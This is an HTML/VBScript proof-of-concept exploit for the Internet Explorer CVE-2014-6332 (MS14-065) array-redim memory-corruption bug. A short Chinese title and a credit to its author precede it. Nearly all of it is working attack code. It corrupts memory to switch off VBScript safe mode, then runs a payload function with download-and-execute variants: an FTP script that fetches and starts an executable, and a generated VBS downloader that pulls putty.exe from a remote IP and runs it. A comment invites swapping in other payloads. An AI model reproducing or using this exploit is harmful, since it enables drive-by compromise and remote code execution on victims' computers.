MS14-065各种版本的poc

//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975

*//

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa() //修改各种版本修改这个函数的内容就可以了
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
//ftp版本
shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe"
//

//http下载版本
objWsh.run "cmd.exe /c echo >>d:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>d:\text.vbs xPost.Open ""GET"",""http://172.16.22.100/putty.exe"",0 & echo >>d:\text.vbs xPost.Send() & echo >>d:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>d:\text.vbs sGet.Mode=3 & echo >>d:\text.vbs sGet.Type=1 & echo >>d:\text.vbs sGet.Open() & echo >>d:\text.vbs sGet.Write xPost.ResponseBody & echo >>d:\text.vbs sGet.SaveToFile ""d:\putty.exe"",2",0
objWsh.run "cscript.exe d:\text.vbs",0,true
wscript.sleep 10000
objWsh.run "d:\putty.exe"

end function

</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,"Win64")>0)   then
exit   function
end if

if (instr(info,"MSIE")>0)   then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit   function

end if

win9x=0

BeginInit()
If Create()=True Then
myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
'   document.write(i)
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim  Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim  Preserve aa(a0)
end function

function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim  Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim  Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim  Preserve aa(a0)
redim   ab(a0)

redim  Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0)  Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim  Preserve aa(a0)
exit  function

end if
else
if(vartype(aa(a1-1))<>0)  Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if

If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim  Preserve aa(a0)

end function

function ReadMemo(add)
On Error Resume Next
redim  Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0

redim  Preserve aa(a0)
end function

</script>

</body>
</html>